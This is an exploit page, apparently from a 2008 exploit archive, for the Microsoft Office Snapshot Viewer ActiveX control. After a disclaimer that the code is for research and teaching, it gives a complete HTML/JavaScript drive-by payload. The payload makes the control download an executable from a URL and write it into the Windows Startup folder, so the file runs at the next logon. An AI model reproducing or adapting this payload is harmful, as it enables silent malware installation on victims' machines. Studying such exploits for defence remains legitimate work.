Microsoft Office Snapshot Viewer ActiveX Exploit
Published:2008-07-09
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
<html> <object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object> <script language='javascript'> var buf1 = 'http://127.0.0.1/a.exe'; var buf2 = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe'; obj.SnapshotPath = buf1; obj.CompressedPath = buf2; obj.PrintSnapshot(); </script> </html>
// Sebug.net [ 2008-07-09 ]